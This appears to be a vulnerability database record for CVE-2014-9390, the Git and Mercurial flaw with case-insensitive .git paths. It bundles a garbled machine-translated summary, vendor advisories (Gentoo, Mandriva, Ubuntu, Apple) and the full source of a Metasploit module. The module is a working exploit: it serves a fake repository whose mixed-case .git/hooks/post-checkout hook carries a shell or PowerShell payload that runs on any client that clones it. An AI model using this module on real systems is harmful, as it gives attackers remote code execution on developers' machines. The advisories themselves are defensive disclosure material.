ID

VAR-202002-0749

CVE

CVE-2014-9390

TITLE

Remote for multiple products Git Vulnerability to execute arbitrary command on server

DESCRIPTION

Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem. Remote for multiple products Git The server is vulnerable to the execution of arbitrary commands. ..(1) Negligible Unicode Code point, (2) git~1/config Expression, or (3) Cleverly crafted with mixed cases that are improperly processed on case-insensitive filesystems .git/config Arbitrary commands can be executed through the tree containing the files. Git is prone to a vulnerability that may allow attackers to overwrite arbitrary local files. Successful exploits may allow an attacker to write arbitrary files in the context of the user running the affected application. libgit2 and so on are all products. libgit2 is a portable Git core development package implemented in C language. Apple Xcode, etc. are all products of Apple (Apple). Apple Xcode is an integrated development environment provided to developers, Matt Mackall Mercurial, etc. are all products of Matt Mackall (Matt Mackall) software developers. An input validation error vulnerability exists in several products. The vulnerability stems from the failure of the network system or product to properly validate the input data. Background ========== Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Powershell def initialize(info = {}) super(update_info( info, 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390', 'Description' => %q( This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities. On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. The third vulnerability with similar characteristics only affects Mercurial clients on Windows, where Windows "short names" (MS-DOS-compatible 8.3 format) are supported. Today this module only truly supports the first vulnerability (Git clients on case-insensitive file systems) but has the functionality to support the remaining two with a little work. ), 'License' => MSF_LICENSE, 'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module ], 'References' => [ ['CVE', '2014-9390'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'], ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'], ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'], ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'], ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'], ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'], ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'], ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a'] ], 'DisclosureDate' => 'Dec 18 2014', 'Targets' => [ [ 'Automatic', { 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic bash-tcp perl bash' } } } ], [ 'Windows Powershell', { 'Platform' => [ 'windows' ], 'Arch' => [ARCH_X86, ARCH_X86_64] } ] ], 'DefaultTarget' => 0)) register_options( [ OptBool.new('GIT', [true, 'Exploit Git clients', true]) ] ) register_advanced_options( [ OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']), OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']), OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']), OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false]) ] ) end def setup # the exploit requires that we act enough like a real Mercurial HTTP instance, # so we keep a mapping of all of the files and the corresponding data we'll # send back along with a trigger file that signifies that the git/mercurial # client has fetched the malicious content. @repo_data = { git: { files: {}, trigger: nil }, mercurial: { files: {}, trigger: nil } } unless datastore['GIT'] || datastore['MERCURIAL'] fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL') end setup_git setup_mercurial super end def setup_git return unless datastore['GIT'] # URI must start with a / unless git_uri && git_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /') end # sanity check the malicious hook: if datastore['GIT_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank') end # In .git/hooks/ directory, specially named files are shell scripts that # are executed when particular events occur. For example, if # .git/hooks/post-checkout was an executable shell script, a git client # would execute that file every time anything is checked out. There are # various other files that can be used to achieve similar goals but related # to committing, updating, etc. # # This builds a fake git repository using the knowledge from: # # http://schacon.github.io/gitbook/7_how_git_stores_objects.html # http://schacon.github.io/gitbook/7_browsing_git_objects.html case target.name when 'Automatic' full_cmd = "#!/bin/sh\n#{payload.encoded}\n" when 'Windows Powershell' psh = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true) full_cmd = "#!/bin/sh\n#{psh}" end sha1, content = build_object('blob', full_cmd) trigger = "/objects/#{get_path(sha1)}" @repo_data[:git][:trigger] = trigger @repo_data[:git][:files][trigger] = content # build tree that points to the blob sha1, content = build_object('tree', "100755 #{datastore['GIT_HOOK']}\0#{[sha1].pack('H*')}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build a tree that points to the hooks directory in which the hook lives, called hooks sha1, content = build_object('tree', "40000 hooks\0#{[sha1].pack('H*')}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build a tree that points to the partially uppercased .git directory in # which hooks live variants = [] %w(g G). each do |g| %w(i I).each do |i| %w(t T).each do |t| git = g + i + t variants << git unless git.chars.none? { |c| c == c.upcase } end end end git_dir = '.' + variants.sample sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build the supposed commit that dropped this file, which has a random user/company email = Rex::Text.rand_mail_address first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten full_name = "#{first.capitalize} #{last.capitalize}" tstamp = Time.now.to_i author_time = rand(tstamp) commit_time = rand(author_time) tz_off = rand(10) commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \ "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \ "\n" \ "Initial commit to open git repository for #{company}!\n" if datastore['VERBOSE'] vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:") commit.each_line { |l| vprint_status(l.strip) } end sha1, content = build_object('commit', "tree #{sha1}\n#{commit}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content # build HEAD @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n" # lastly, build refs @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n" end def setup_mercurial return unless datastore['MERCURIAL'] # URI must start with a / unless mercurial_uri && mercurial_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /') end # sanity check the malicious hook if datastore['MERCURIAL_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank') end # we fake the Mercurial HTTP protocol such that we are compliant as possible but # also as simple as possible so that we don't have to support all of the protocol # complexities. Taken from: # http://mercurial.selenic.com/wiki/HttpCommandProtocol # http://selenic.com/hg/file/tip/mercurial/wireproto.py @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN' fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814' @repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n" # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo") # TODO: finish building the fake repository end # Build's a Git object def build_object(type, content) # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html header = "#{type} #{content.size}\0" store = header + content [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] end # Returns the Git object path name that a file with the provided SHA1 will reside in def get_path(sha1) sha1[0...2] + '/' + sha1[2..40] end def exploit super end def primer # add the git and mercurial URIs as necessary if datastore['GIT'] hardcoded_uripath(git_uri) print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") end if datastore['MERCURIAL'] hardcoded_uripath(mercurial_uri) print_status("Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}") end end # handles routing any request to the mock git, mercurial or simple HTML as necessary def on_request_uri(cli, req) # if the URI is one of our repositories and the user-agent is that of git/mercurial # send back the appropriate data, otherwise just show the HTML version if (user_agent = req.headers['User-Agent']) if datastore['GIT'] && user_agent =~ /^git\// && req.uri.start_with?(git_uri) do_git(cli, req) return elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri) do_mercurial(cli, req) return end end do_html(cli, req) end # simulates a Git HTTP server def do_git(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') if @repo_data[:git][:files].key?(req_file) vprint_status("Sending Git #{req_file}") send_response(cli, @repo_data[:git][:files][req_file]) if req_file == @repo_data[:git][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Git #{req_file} doesn't exist") send_not_found(cli) end end # simulates an HTTP server with simple HTML content that lists the fake # repositories available for cloning def do_html(cli, _req) resp = create_response resp.body = <<HTML <html> <head><title>Public Repositories</title></head> <body> <p>Here are our public repositories:</p> <ul> HTML if datastore['GIT'] this_git_uri = URI.parse(get_uri).merge(git_uri) resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>" else resp.body << "<li><a>Git</a> (currently offline)</li>" end if datastore['MERCURIAL'] this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri) resp.body << "<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>" else resp.body << "<li><a>Mercurial</a> (currently offline)</li>" end resp.body << <<HTML </ul> </body> </html> HTML cli.send_response(resp) end # simulates a Mercurial HTTP server def do_mercurial(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so uri = URI.parse(req.uri) req_path = uri.path req_path += "?#{uri.query}" if uri.query req_path.gsub!(/^#{mercurial_uri}/, '') if @repo_data[:mercurial][:files].key?(req_path) vprint_status("Sending Mercurial #{req_path}") send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1') if req_path == @repo_data[:mercurial][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Mercurial #{req_path} doesn't exist") send_not_found(cli) end end # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI def git_uri return @git_uri if @git_uri if datastore['GIT_URI'].blank? @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' else @git_uri = datastore['GIT_URI'] end end # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI def mercurial_uri return @mercurial_uri if @mercurial_uri if datastore['MERCURIAL_URI'].blank? @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase else @mercurial_uri = datastore['MERCURIAL_URI'] end end end . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201612-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mercurial: Multiple vulnerabilities Date: December 07, 2016 Bugs: #533008, #544332, #578546, #582238 ID: 201612-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in Mercurial, the worst of which could lead to the remote execution of arbitrary code. Background ========== Mercurial is a distributed source control management system. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-vcs/mercurial < 3.8.4 >= 3.8.4 Description =========== Multiple vulnerabilities have been discovered in Mercurial. Please review the CVE identifier and bug reports referenced for details. Impact ====== A remote attacker could possibly execute arbitrary code with the privileges of the process. Workaround ========== There is no known workaround at this time. Resolution ========== All mercurial users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-vcs/mercurial-3.8.4" References ========== [ 1 ] CVE-2014-9390 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9390 [ 2 ] CVE-2014-9462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9462 [ 3 ] CVE-2016-3068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3068 [ 4 ] CVE-2016-3069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3069 [ 5 ] CVE-2016-3105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3105 [ 6 ] CVE-2016-3630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3630 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201612-19 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2015:169 http://www.mandriva.com/en/support/security/ _______________________________________________________________________ Package : git Date : March 30, 2015 Affected: Business Server 2.0 _______________________________________________________________________ Problem Description: Updated git packages fix security vulnerability: It was reported that git, when used as a client on a case-insensitive filesystem, could allow the overwrite of the .git/config file when the client performed a git pull. Because git permitted committing .Git/config (or any case variation), on the pull this would replace the user&#039;s .git/config. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9390 http://advisories.mageia.org/MGASA-2014-0546.html _______________________________________________________________________ Updated Packages: Mandriva Business Server 2/X86_64: ef3f480ca48a2a9611bd11fa8a045892 mbs2/x86_64/git-1.8.5.6-1.mbs2.x86_64.rpm efd3deae08fd17b80008bd3dc881d1f7 mbs2/x86_64/git-arch-1.8.5.6-1.mbs2.x86_64.rpm c60432719a43e70eb929c1c75c93fdda mbs2/x86_64/git-core-1.8.5.6-1.mbs2.x86_64.rpm 10fb62c0748447bd1b960789125e8d1b mbs2/x86_64/git-core-oldies-1.8.5.6-1.mbs2.x86_64.rpm dafec670f61de3e9942a97377b604859 mbs2/x86_64/git-cvs-1.8.5.6-1.mbs2.x86_64.rpm 879edb749813e5e175e90c88d2188eb9 mbs2/x86_64/git-email-1.8.5.6-1.mbs2.x86_64.rpm 1261450cb657453cd10a055301e42e01 mbs2/x86_64/gitk-1.8.5.6-1.mbs2.x86_64.rpm 8b4e493293c55a955e439233ae55ec99 mbs2/x86_64/git-prompt-1.8.5.6-1.mbs2.x86_64.rpm 2a4694ce47fe835f532cd7acc734e7b3 mbs2/x86_64/git-svn-1.8.5.6-1.mbs2.x86_64.rpm 39c2ff102bf754a4ca9a6d9d70fbc79c mbs2/x86_64/gitview-1.8.5.6-1.mbs2.x86_64.rpm 35bb63e42cfe602a24ae790fe3ddbd54 mbs2/x86_64/gitweb-1.8.5.6-1.mbs2.x86_64.rpm d464e9766d38928a7fe9510382356724 mbs2/x86_64/lib64git-devel-1.8.5.6-1.mbs2.x86_64.rpm 644c0f388c821f9192485494ac3199d5 mbs2/x86_64/perl-Git-1.8.5.6-1.mbs2.x86_64.rpm 261134d774a1b833817d8855214a9412 mbs2/SRPMS/git-1.8.5.6-1.mbs2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFVGPUcmqjQ0CJFipgRAh4wAKDuznNiViTa2PaV8idvg0tSlPIzMACg7AqX AknCsk/2slzIzxNpACLxeDI= =Vdej -----END PGP SIGNATURE----- . Content-Disposition: inline ==========================================================================Ubuntu Security Notice USN-2470-1 January 14, 2015 git vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 14.10 - Ubuntu 14.04 LTS - Ubuntu 12.04 LTS Summary: Git could be made to run programs as your login if it received specially crafted changes from a remote repository. Software Description: - git: fast, scalable, distributed revision control system Details: Matt Mackall and Augie Fackler discovered that Git incorrectly handled certain filesystem paths. The remote attacker would need write access to a Git repository that the victim pulls from. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 14.10: git 1:2.1.0-1ubuntu0.1 Ubuntu 14.04 LTS: git 1:1.9.1-1ubuntu0.1 Ubuntu 12.04 LTS: git 1:1.7.9.5-1ubuntu0.1 After a standard system update you need to set the core.protectHFS and/or core.protectNTFS Git configuration variables to "true" if you store Git trees in HFS+ and/or NTFS filesystems. If you host Git trees, setting the core.protectHFS, core.protectNTFS, and receive.fsckObjects Git configuration variables to "true" will cause your Git server to reject objects containing malicious paths intended to overwrite the Git metadata. References: http://www.ubuntu.com/usn/usn-2470-1 CVE-2014-9390 Package Information: https://launchpad.net/ubuntu/+source/git/1:2.1.0-1ubuntu0.1 https://launchpad.net/ubuntu/+source/git/1:1.9.1-1ubuntu0.1 https://launchpad.net/ubuntu/+source/git/1:1.7.9.5-1ubuntu0.1 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2015-03-09-4 Xcode 6.2 Xcode 6.2 is now available and addresses the following: subversion Available for: OS X Mavericks v10.9.4 or later Impact: Multiple vulnerabilities in Apache Subversion Description: Multiple vulnerabilities existed in Apache Subversion, the most serious of which may have allowed an attacker with a privileged position to spoof SSL servers via a crafted certificate. These issues were addressed by updating Apache Subversion to version 1.7.19. This issue was addressed by adding additional checks. CVE-ID CVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of Mercurial Xcode 6.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "6.2"

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

Input Validation Error

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Matt Mackall and Augie Fackler

SOURCES

LAST UPDATE DATE

2024-11-11T22:53:19.064000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE